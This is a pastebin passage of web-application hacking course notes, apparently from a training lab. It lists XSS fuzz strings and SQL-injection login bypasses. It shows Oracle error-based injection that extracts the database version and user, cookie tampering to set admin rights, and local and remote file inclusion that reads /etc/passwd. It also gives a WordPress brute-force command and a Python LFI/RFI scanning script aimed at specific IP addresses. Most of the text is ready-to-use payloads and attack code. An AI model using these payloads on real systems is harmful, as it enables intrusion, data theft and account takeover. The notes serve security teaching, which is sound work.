  3259.             ()          <----- Take the parameter value and put it in parenthesis
  3260.             (5-1)       <----- See if you can perform an arithmetic function
  3261.  
  3262.  
  3263.     - Are the fuzz strings rendering executable code?
  3264.         - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
  3265.         - Some example strings that I use are:
  3266.             <b>hello</b>
  3267.             <u>hello</u>
  3268.             <script>alert(123);</script>
  3269.             <script>alert(xss);</script>
  3270.             <script>alert('xss');</script>
  3271.             <script>alert("xss");</script>
  3272.  
  3273.  
  3274.        
  3275.  
  3276.  
  3277.  
  3278. ############################
  3279. # Trading Web App with WAF #
  3280. # http://54.213.131.105    #
  3281. ############################
  3282.  
  3283.  
  3284. Try the following in the search box:
  3285.     <script>alert(123);</script>
  3286.     <script>alert(123);</script
  3287.     <script>alert(123)
  3288.     <script>alert
  3289.     <script>
  3290.     <script
  3291.     <scrip
  3292.     <scri
  3293.     <scr
  3294.     <sc
  3295.     <s
  3296.     <p
  3297.     <
  3298.     < s
  3299.     Joe'+OR+1=1;--
  3300.  
  3301.    
  3302. Open a new tab in firefox and try this:
  3303.     http://54.213.131.105/Searchresult.aspx?%u003cscript>prompt(123)%u003c/script>=ScriptName
  3304.  
  3305.  
  3306.     xss_upload.txt (Upload Bulk Order)
  3307.     <script>alert(123);</script>
  3308.  
  3309.  
  3310. Login Box:
  3311.  
  3312.     ' or 1=1 or ''='
  3313.     anything
  3314.  
  3315.  
  3316.  
  3317. Tamper Data: (notice 2 session IDs)
  3318.  
  3319.     AcmeTrading=a4b796687b846dd4a34931d708c62b49;       SessionID is md5
  3320.     IsAdmin=yes;
  3321.     ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45
  3322.  
  3323.  
  3324.  
  3325. Profile - Detail    (tamper data)
  3326.     Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
  3327.     joe|set
  3328.  
  3329.  
  3330.  
  3331.  
  3332.  
  3333.  
  3334.  
  3335. ###########################################################
  3336. # Attacking an Oracle/JSP based WebApp with SQL Injection #
  3337. ###########################################################
  3338.  
  3339.  
  3340.  
  3341.  
  3342.  
  3343. http://54.69.156.253:8081/bookcompany/
  3344.  
  3345.  
  3346. user:   a' OR 'a'='a
  3347. pass:   a' OR 'a'='a
  3348.  
  3349.  
  3350.  
  3351.  
  3352.  
  3353.  
  3354.  
  3355. http://54.69.156.253:8081/bookcompany/author.jsp?id=111
  3356.  
  3357.  
  3358. [ Search by Username ]  Joe' OR 'a'='a
  3359.  
  3360.  
  3361.  
  3362.  
  3363.  
  3364.  
  3365.  
  3366.  
  3367.  
  3368.  
  3369.  
  3370.  
  3371. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1
  3372.  
  3373.  
  3374.  
  3375. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' OR '1'='1
  3376.  
  3377.  
  3378.  
  3379.  
  3380.  
  3381.  
  3382.  
  3383.  
  3384.  
  3385.  
  3386.  
  3387.  
  3388.  
  3389.  
  3390.  
  3391. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
  3392.  
  3393.  
  3394. Host is running:
  3395.  
  3396.  
  3397.  
  3398.  
  3399.  
  3400. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT user FROM dual))--
  3401.  
  3402. User is:
  3403.  
  3404.  
  3405.  
  3406.  
  3407.  
  3408. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name))--
  3409.  
  3410. Current database is:
  3411. RAW Paste Data
  3412.  
  3413.  
  3414.  
  3415.  
  3416. ######################
  3417. # Lesson 27: Web App #
  3418. ######################
  3419. vi wpbruteforcer.py
  3420.  
  3421.  
  3422. python wpbruteforcer.py -t strategicsec.com -u j0e -w list.txt
  3423.  
  3424.  
  3425.  
  3426. - Here is an example of an LFI
  3427. - Open this page in Firefox:
  3428. http://54.172.112.249/showfile.php?filename=contactus.txt
  3429.  
  3430. - Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt)
  3431. - Here you see a direct reference to a file on the local filesystem of the victim machine.
  3432. - You can attack this by doing the following:
  3433. http://54.172.112.249/showfile.php?filename=/etc/passwd
  3434.  
  3435. - This is an example of a Local File Include (LFI), to change this attack into a Remote File Include (RFI) you need some content from
  3436. - somewhere else on the Internet. Here is an example of a text file on the web:
  3437. http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
  3438.  
  3439. - Now we can attack the target via RFI like this:
  3440. http://54.172.112.249/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
  3441.  
  3442.  
  3443. - Now let's see if we can write some code to do this for us:
  3444.  
  3445. vi LFI-RFI.py
  3446.  
  3447.  
  3448.  
  3449. #!/usr/bin/env python
  3450. print "\n### PHP LFI/RFI Detector ###"
  3451. print "### Sean Arries 09/18/09 ###\n"
  3452.  
  3453. import urllib2,re,sys
  3454.  
  3455.  
  3456. TARGET = "http://554.172.112.249/showfile.php?filename=contactus.txt"
  3457. RFIVULN = "http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt?"
  3458. TravLimit = 12
  3459.  
  3460. print "==> Testing for LFI vulns.."
  3461. TARGET = TARGET.split("=")[0]+"=" ## URL MANUPLIATION
  3462. for x in xrange(1,TravLimit): ## ITERATE THROUGH THE LOOP
  3463.     TARGET += "../"
  3464.     try:
  3465.         source = urllib2.urlopen((TARGET+"etc/passwd")).read() ## WEB REQUEST
  3466.     except urllib2.URLError, e:
  3467.         print "$$$ We had an Error:",e
  3468.         sys.exit(0)
  3469.     if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE
  3470.         print "!! ==> LFI Found:",TARGET+"etc/passwd"
  3471.         break ## BREAK LOOP WHEN VULN FOUND
  3472.  
  3473. print "\n==> Testing for RFI vulns.."
  3474. TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANUPLIATION
  3475. try:
  3476.     source = urllib2.urlopen(TARGET).read() ## WEB REQUEST
  3477. except urllib2.URLError, e:
  3478.     print "$$$ We had an Error:",e
  3479.     sys.exit(0)
  3480. if re.search("j0e",source): ## SEARCH FOR TEXT IN SOURCE
  3481.     print "!! => RFI Found:",TARGET
  3482.  
  3483.  
  3484. print "\nScan Complete\n" ## DONE
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top